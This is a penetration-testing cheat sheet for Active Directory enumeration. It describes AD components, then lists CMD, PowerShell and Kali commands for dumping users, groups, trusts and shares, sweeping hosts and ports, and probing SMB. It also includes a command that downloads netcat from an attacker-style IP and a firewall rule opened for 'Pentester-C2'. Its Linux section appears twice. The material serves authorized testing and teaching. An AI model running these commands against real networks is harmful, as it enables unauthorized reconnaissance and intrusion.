Active Directory Enumeration

Enumerating Active Directory can provide valuable information about the network's structure and potential vulnerabilities during penetration testing

• Active Directory Components

• CMD Tools

• PowerShell Tools

• Linux/Kali Tools

• Resources

Active Directory Components

• Domain Controllers:

  • Holds the AD DS data store

  • Handles authentication and authorization services

  • Replicate updates from other domain controllers in the forest

  • Allows admin access to manage domain resources

• AD DS Data Store:

  • Contains NTDS.dit which contains all AD DC information including password hashes for domain users

  • Stored by default in %SystemRoot%\NTDS

  • Accessible only by the domain controller

• Forest

  • Container that holds pieces of AD network

  • Forest is a collection of one or more domain trees inside

  • Forest consists of:

    • Trees - A hierarchy of domains in Active Directory Domain Services

    • Domains - Used to group and manage objects

    • Organizational Units (OUs) - Containers for groups, computers, users, printers and other OUs

    • Trusts - Allows users to access resources in other domains

    • Objects - users, groups, printers, computers, shares

    • Domain Services - DNS Server, LLMNR, IPv6

    • Domain Schema - Rules for object creation

• Users

  • 4 primary types of user accounts:

    • Domain admins

    • Service accounts

    • Local administrators

    • Domain users

• Groups

  • Distribution groups: specify email distribution lists

  • Security groups: specify permissions for large number of users, including the following default security groups:

    • Domain Controllers - All domain controllers in the domain

    • Domain Guests - All domain guests

    • Domain Users - All domain users

    • Domain Computers - All workstations and servers joined to the domain

    • Domain Admins - Designated administrators of the domain

    • Enterprise Admins - Designated administrators of the enterprise

    • Schema Admins - Designated administrators of the schema

    • DNS Admins - DNS Administrators Group

    • DNS Update Proxy - DNS clients who are permitted to perform dynamic updates on behalf of some other clients (such as DHCP servers).

    • Allowed RODC Password Replication Group - Members in this group can have their passwords replicated to all read-only domain controllers in the domain

    • Group Policy Creator Owners - Members in this group can modify group policy for the domain Denied RODC Password Replication Group - Members in this group cannot have their passwords replicated to any read-only domain controllers in the domain

    • Protected Users - Members of this group are afforded additional protections against authentication security threats. See http://go.microsoft.com/fwlink/?LinkId=298939 for more information.

    • Cert Publishers - Members of this group are permitted to publish certificates to the directory

    • Read-Only Domain Controllers - Members of this group are Read-Only Domain Controllers in the domain

    • Enterprise Read-Only Domain Controllers - Members of this group are Read-Only Domain Controllers in the enterprise

    • Key Admins - Members of this group can perform administrative actions on key objects within the domain.

    • Enterprise Key Admins - Members of this group can perform administrative actions on key objects within the forest.

    • Cloneable Domain Controllers - Members of this group that are domain controllers may be cloned.

    • RAS and IAS Servers - Servers in this group can access remote access properties of users

• Domain Trusts

  • Put rules into place about domain interactions

  • Trusts allow users to gain access to other domain resources

  • Types of trusts:

    • Directional - The direction of the trust flows from a trusting domain to a trusted domain

    • Transitive - The trust relationship expands beyond just two domains to include other trusted domains

• Domain Policies

  • Like domain groups, except instead of permissions they contain rules

• Active Directory Domain Services

  • Services that a domain controller provides to the rest of the domain or tree

CMD Tools

Domain User Info with CMD

Enumerating with PowerShell

A simple batch script with these commands is here: \tools\WinDomainEnum.bat

Display DC Address, Domain Name, Roles

wmic ntdomain

Dsquery User List

dsquery user domainroot

User Logon Name from Email

dsquery * domainroot -filter "(&(objectCategory=Person)(objectClass=User)(mail=e-mailaddress))" -attr name

Display Trusted Domain

dsquery * -filter "(objectclass=TrustedDomain)" -attr trustpartner,flatname,trustdirection

Domain Admins of from Remote Trused Domain

dsquery * -filter "(cn=Domain Admins)" -attr member -d trustedDomain

Display All Domain Users

wmic /NAMESPACE:\\root\directory\ldap PATH ds_user GET ds_samaccountname

Display All Domain Groups

wmic /NAMESPACE:\\root\directory\ldap PATH ds_group GET ds_samaccountname

Display All Domain Computers

wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_samaccountname

View Domain User Info

net user /domain
 net user pentestuser /domain

Display Domain Admin Users

net group “Domain Admins” /domain

View All Hosts in Domain/Workgroup

net view

Display Network Shares

net share

Display Domain Trust Info

nltest
 nltest /finduser:sweppler
 nltest /dclist:mydomain
 nltest /trusted_domains

@echo off

echo Enumerating Active Directory objects...

dsquery * -filter "(objectCategory=user)" > ad_users.txt
dsquery * -filter "(objectCategory=group)" > ad_groups.txt
dsquery * -filter "(objectCategory=computer)" > ad_computers.txt

echo Active Directory information has been saved to the following files:
echo ad_users.txt
echo ad_groups.txt
echo ad_computers.txt

PowerShell Tools

Ping Sweeper

 1..255 | % {echo "192.168.1.$_"; ping -n 1 -w 100 192.168.1.$_ | Select-String ttl}

Port Sweeper

1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("<IPADDR>", $_)) "Port $_ is open!"} 2>$null

Sweep Range of IPs for Single Port

foreach ($ip in 1..20) {Test-NetConnection -Port 80 -InformationLevel "Detailed" 192.168.1.$ip}

Sweep IPs and Ports

1..20 | % { $a = $_; 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.0.0.$a",$_)) "Port $_ is open!"} 2>$null}

Test Egress Filtering

1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("allports.exposed",$_)) "Port $_ is open" } 2>$null

Display Domain Admins

([adsisearcher]"(&(objectClass=User)(admincount=1))").FindAll().Properties.samaccountname

Display Accounts that Don't Lock Out

dsquery * -filter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=65536))"

Web Client to Download Files (eg NetCat)

wget "http://10.10.10.10/nc.exe" -outfile "c:\nc.exe"

Get Firewall Rules

Get-NetFirewallRule -all | Out-GridView
 Get-NetFirewallRule -all | Export-csv <file_path.csv>

Add Firewall Rule

New-NetFirewallRule -Action Allow -DisplayName Pentester-C2 -RemoteAddress <IPADDR>

Generate CSV with User Info

Import-Module ActiveDirectory

$results = @()

Get-ADObject -Filter * -SearchBase "LDAP://dc=mydomain,dc=local" |
ForEach-Object {
    $results += $_
}

$results | Select-Object Name, ObjectClass, DistinguishedName |
Export-Csv -Path "C:\ADObjects.csv" -NoTypeInformation

Linux/Kali Tools

SMB Enumeration Tools

nmblookup -A target
smbclient //MOUNT/share -I target -N
rpcclient -U "" target
enum4linux target

Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain

nbtscan 192.168.1.0/24

Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing

enum4linux -a target-ip

Fingerprint SMB Version

smbclient -L //192.168.1.100 

Find open SMB Shares in Nmap

nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.1.0/24   

Enumerate SMB Users in Nmap

nmap -sU -sS --script=smb-enum-users -p U:137,T:139 192.168.11.200-254 

Enumerate SMB Using Samrdump Python Impacket

python /usr/share/doc/python-impacket-doc/examples
/samrdump.py 192.168.XXX.XXX

Linux/Kali Tools

SMB Enumeration Tools

nmblookup -A target
smbclient //MOUNT/share -I target -N
rpcclient -U "" target
enum4linux target

Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain

nbtscan 192.168.1.0/24

Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing

enum4linux -a target-ip

Fingerprint SMB Version

smbclient -L //192.168.1.100 

Find open SMB Shares in Nmap

nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.1.0/24   

Enumerate SMB Users in Nmap

nmap -sU -sS --script=smb-enum-users -p U:137,T:139 192.168.11.200-254 

Enumerate SMB Using Samrdump Python Impacket

python /usr/share/doc/python-impacket-doc/examples
/samrdump.py 192.168.XXX.XXX

ridenum.py 192.168.XXX.XXX 500 50000 dict.txt https://github.com/trustedsec/ridenum

Metasploit RID Cycling

use auxiliary/scanner/smb/smb_lookupsid

Resources

• Information dumper via LDAP

• Integrated DNS dumping by any authenticated user

• Advanced Discovery of Privileged Accounts

• Detailed Active Directory Recon Tool

• Powershell AD Enumeration

• Data collector tool

https://www.hackingarticles.in/impacket-guide-smb-msrpc/

https://www.sans.org/blog/pen-test-poster-white-board-powershell-built-in-port-scanner/

• A simple batch script with these commands: \tools\WinNetEnum.bat

A simple batch script with these commands is here: \tools\WinDomainEnum.bat

"C:\Code\Penetration-Testing - Working\tools\WindowsEnum.ps1"

"C:\Code\Penetration-Testing - Working\tools\WinUserEnum.bat"